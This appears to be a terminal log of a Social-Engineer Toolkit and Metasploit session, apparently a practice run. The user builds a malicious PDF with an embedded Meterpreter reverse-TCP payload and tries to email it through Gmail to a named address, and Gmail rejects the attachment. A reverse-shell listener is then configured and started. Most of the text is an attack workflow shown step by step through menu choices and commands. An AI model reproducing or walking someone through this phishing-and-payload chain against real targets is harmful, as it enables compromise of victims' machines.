[---] The Social-Engineer Toolkit (SET) [---] [---] W

1. [---] The Social-Engineer Toolkit (SET) [---]
2. [---] Written by David Kennedy (ReL1K) [---]
3. [---] Version: 1.0 [---]
4. [---] Codename: 'Devolution' [---]
5. [---] Report bugs to: davek@social-engineer.org [---]
6. [---] Follow Me On Twitter: dave_rel1k [---]
7. [---] Java Applet Written by: Thomas Werth [---]
8. [---] Homepage: http://www.secmaniac.com [---]
9. [---] Framework: http://www.social-engineer.org [---]
10. [---] Over 1.4 million downloads and counting. [---]
11.  
12. Welcome to the Social-Engineer Toolkit (SET). Your one
13. stop shop for all of your social-engineering needs..
14.  
15. DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
16.  
17. Select from the menu:
18.  
19. 1. Spear-Phishing Attack Vectors
20. 2. Website Attack Vectors
21. 3. Infectious Media Generator
22. 4. Create a Payload and Listener
23. 5. Mass Mailer Attack
24. 6. Teensy USB HID Attack Vector
25. 7. SMS Spoofing Attack Vector
26. 8 Update the Metasploit Framework
27. 9. Update the Social-Engineer Toolkit
28. 10. Help, Credits, and About
29. 11. Exit the Social-Engineer Toolkit
30.  
31. Enter your choice: 1
32.  
33. Welcome to the SET E-Mail attack method. This module allows you
34. to specially craft email messages and send them to a large (or small)
35. number of people with attached fileformat malicious payloads. If you
36. want to spoof your email address, be sure "Sendmail" is installed (it
37. is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
38. to SENDMAIL=ON.
39.  
40. There are two options, one is getting your feet wet and letting SET do
41. everything for you (option 1), the second is to create your own FileFormat
42. payload and use it in your own attack. Either way, good luck and enjoy!
43.  
44. 1. Perform a Mass Email Attack
45. 2. Create a FileFormat Payload
46. 3. Create a Social-Engineering Template
47. 4. Return to Main Menu
48.  
49. Enter your choice: 1
50.  
51. Select the file format exploit you want.
52. The default is the PDF embedded EXE.
53.  
54. ********** PAYLOADS **********
55.  
56. 1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
57. 2. Adobe Flash Player 'Button' Remote Code Execution
58. 3. Adobe CoolType SING Table 'uniqueName' Overflow
59. 4. Adobe Flash Player 'newfunction' Invalid Pointer Use
60. 5. Adobe Collab.collectEmailInfo Buffer Overflow
61. 6. Adobe Collab.getIcon Buffer Overflow
62. 7. Adobe JBIG2Decode Memory Corruption Exploit
63. 8. Adobe PDF Embedded EXE Social Engineering
64. 9. Adobe util.printf() Buffer Overflow
65. 10. Custom EXE to VBA (sent via RAR) (RAR required)
66. 11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
67. 12. Adobe PDF Embedded EXE Social Engineering (NOJS)
68.  
69. Enter the number you want (press enter for default): 8
70. You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
71.  
72. 1. Use your own PDF for attack
73. 2. Use built-in BLANK PDF for attack
74.  
75. Enter your choice (return for default): 1
76. Enter path to your pdf (enter for default):
77. [*] Defaulting to BLANK PDF built into SET...
78. [*] Unable to find PDF, defaulting to blank PDF.
79.  
80. 1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
81. 2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
82. 3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
83. 4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
84. 5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
85. 6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
86. 7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
87.  
88. Enter the payload you want (press enter for default): 2
89. Enter the port to connect back on (press enter for default): 4444
90. [*] Generating fileformat exploit...
91. [*] Payload creation complete.
92. [*] All payloads get sent to the src/program_junk/template.pdf directory
93.  
94.  
95. As an added bonus, use the file-format creator in SET to create your attachment.
96.  
97. Right now the attachment will be imported with filename of 'template.whatever'
98.  
99. Do you want to rename the file?
100.  
101. example Enter the new filename: moo.pdf
102.  
103. 1. Keep the filename, I don't care.
104. 2. Rename the file, I want to be cool.
105.  
106. Enter your choice (enter for default): 2
107. Enter the new filename: practica.pdf
108. Filename changed, moving on...
109.  
110. Social Engineer Toolkit Mass E-Mailer
111.  
112. There are two options on the mass e-mailer, the first would
113. be to send an email to one individual person. The second option
114. will allow you to import a list and send it to as many people as
115. you want within that list.
116.  
117. What do you want to do:
118.  
119. 1. E-Mail Attack Single Email Address
120. 2. E-Mail Attack Mass Mailer
121. 3. Return to main menu.
122.  
123. Enter your choice: 1
124.  
125. Do you want to use a predefined template or craft
126. a one time email template.
127.  
128. 1. Pre-Defined Template
129. 2. One-Time Use Email Template
130.  
131. Enter your choice: 2
132. Enter the subject of the email: practica
133.  
134. Do you want to send the message as html or plain?
135.  
136. 1. HTML
137. 2. Plain
138.  
139. Enter your choice (enter for plain): 1
140.  
141. Enter the body of the message, hit return for a new line.
142.  
143. Type your body and enter control+c when finished: practica
144. Next line of the body: de
145. Next line of the body: SET
146. Next line of the body: ^C
147. Enter who you want to send email to: dannyLopez68@gmail.com
148.  
149. What option do you want to use?
150.  
151. 1. Use a GMAIL Account for your email attack.
152. 2. Use your own server or open relay
153.  
154. Enter your choice: 1
155. Enter your GMAIL email address: z3r0f15h@gmail.com
156. Enter your password for gmail (it will not be displayed back to you):
157. (552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. x36sm18742937anx.34')
158. (8, 'EOF occurred in violation of protocol')
159.  
160. It appears your password was incorrect.
161. Printing response: (8, 'EOF occurred in violation of protocol')
162. Press enter to continue.
163.  
164.  
165. SET has finished delivering the emails.
166.  
167. Do you want to setup a listener yes or no: yes
168. [-] ***
169. [-] * WARNING: No database support: String User Disabled Database Support
170. [-] ***
171.  
172. _ _ _ _
173. | | | | (_) |
174. _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
175. | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
176. | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
177. |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
178. | |
179. |_|
180.  
181.  
182. =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
183. + -- --=[ 639 exploits - 319 auxiliary
184. + -- --=[ 215 payloads - 27 encoders - 8 nops
185. =[ svn r11425 updated today (2010.12.27)
186.  
187. resource (src/program_junk/meta_config)> use exploit/multi/handler
188. resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
189. PAYLOAD => windows/meterpreter/reverse_tcp
190. resource (src/program_junk/meta_config)> set LHOST 192.168.0.11
191. LHOST => 192.168.0.11
192. resource (src/program_junk/meta_config)> set LPORT 4444
193. LPORT => 4444
194. resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
195. ENCODING => shikata_ga_nai
196. resource (src/program_junk/meta_config)> set ExitOnSession false
197. ExitOnSession => false
198. resource (src/program_junk/meta_config)> exploit -j
199. [*] Exploit running as background job.
200. msf exploit(handler) >
201. [*] Started reverse handler on 192.168.0.11:4444
202. [*] Starting the payload handler...